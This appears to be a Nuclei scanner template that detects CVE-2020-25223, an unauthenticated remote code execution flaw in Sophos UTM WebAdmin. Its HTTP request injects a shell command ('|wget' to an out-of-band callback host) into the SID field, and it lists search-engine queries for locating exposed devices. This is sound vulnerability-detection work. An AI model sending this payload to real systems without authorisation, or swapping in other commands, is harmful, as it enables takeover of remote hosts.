Sophos UTM Preauth - Remote Code Execution
ID: CVE-2020-25223
Severity: critical
Author: gy741
Tags: cve,cve2020,sophos,rce,oast,unauth,kev
Description
Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11.
YAML Source
id: CVE-2020-25223

info:
  name: Sophos UTM Preauth - Remote Code Execution
  author: gy741
  severity: critical
  description: Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11.
  impact: |
    Successful exploitation of this vulnerability could lead to remote code execution, allowing attackers to take control of the affected system.
  remediation: |
    Apply the latest security patches provided by Sophos to mitigate the vulnerability.
  reference:
    - https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223
    - https://community.sophos.com/b/security-blog/posts/advisory-resolved-rce-in-sg-utm-webadmin-cve-2020-25223
    - https://nvd.nist.gov/vuln/detail/CVE-2020-25223
    - https://community.sophos.com/b/security-blog
    - https://cwe.mitre.org/data/definitions/78.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-25223
    cwe-id: CWE-78
    epss-score: 0.97521
    epss-percentile: 0.99989
    cpe: cpe:2.3:a:sophos:unified_threat_management:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: sophos
    product: unified_threat_management
    shodan-query: http.title:"securepoint utm"
    fofa-query: title="securepoint utm"
    google-query: intitle:"securepoint utm"
  tags: cve,cve2020,sophos,rce,oast,unauth,kev

http:
  - raw:
      - |
        POST /var HTTP/1.1
        Host: {{Hostname}}
        Accept: text/javascript, text/html, application/xml, text/xml, */*
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        X-Requested-With: XMLHttpRequest
        X-Prototype-Version: 1.5.1.1
        Content-Type: application/json; charset=UTF-8
        Origin: {{BaseURL}}
        Connection: close
        Referer: {{BaseURL}}
        Sec-Fetch-Dest: empty
        Sec-Fetch-Mode: cors
        Sec-Fetch-Site: same-origin

        {"objs": [{"FID": "init"}], "SID": "|wget http://{{interactsh-url}}|", "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, "wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": true}

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a004730450221008df205cfdedc09609bcb88b22262b9626ef80e3692b1959055c24ba024e4340f022028c9a12078ac80c4e6361fd8195659c4a01def8953df48a266f005341768c909:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is run with the Nuclei scanner to check a target for CVE-2020-25223. It sends a single request to the WebAdmin interface and confirms the finding out-of-band: the match is an HTTP interaction received at the interactsh URL, so no response content from the target is needed.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-25223.yaml"